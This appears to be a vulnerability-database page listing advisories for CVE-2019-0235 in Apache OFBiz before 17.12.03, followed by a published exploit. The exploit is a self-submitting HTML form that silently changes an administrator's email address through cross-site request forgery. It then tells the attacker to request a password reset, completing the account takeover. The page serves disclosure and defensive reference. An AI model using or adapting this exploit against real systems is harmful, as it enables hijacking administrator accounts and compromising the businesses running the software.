| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| Apache OFBiz 17.12.03 Cross Site Request Forgery Vulnerability | 2 May 202000:00 | – | zdt | |
| Apache OFBiz Cross-Site Request Forgery Vulnerability | 7 May 202000:00 | – | cnvd | |
| CVE-2019-0235 | 30 Apr 202019:22 | – | cve | |
| CVE-2019-0235 | 30 Apr 202019:22 | – | cvelist | |
| CVE-2019-0235 | 30 Apr 202020:15 | – | nvd | |
| Apache OFBiz 17.12.03 Cross Site Request Forgery | 1 May 202000:00 | – | packetstorm | |
| Cross site request forgery (csrf) | 30 Apr 202020:15 | – | prion | |
| CVE-2019-0235 | 22 May 202510:04 | – | redhatcve |
# Exploit Title: Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)
# Exploit Author: Faiz Ahmed Zaidi
# Vendor Homepage: [https://ofbiz.apache.org/security.html]
# Software Link: https://ofbiz.apache.org/download.html#security
# Version: Before 17.12.03
# Tested on: Linux and Windows
# CVE : CVE-2019-0235
#Exploit Code:
<html>
<body>
<form action="https://hostipaddress:8443/partymgr/control/updateEmailAddress" method="POST">
<input type="hidden" name="contactMechId" value="admin" />
<input type="hidden" name="contactMechTypeId" value="EMAIL_ADDRESS" />
<input type="hidden" name="partyId" value="admin" />
<input type="hidden" name="DONE_PAGE" value="viewprofile?party_id=admin∂yId=admin" />
<input type="hidden" name="emailAddress" value="[email protected]" />
<input type="hidden" name="allowSolicitation" value="Y" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
After that do a password reset via forget password.
It's done :)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation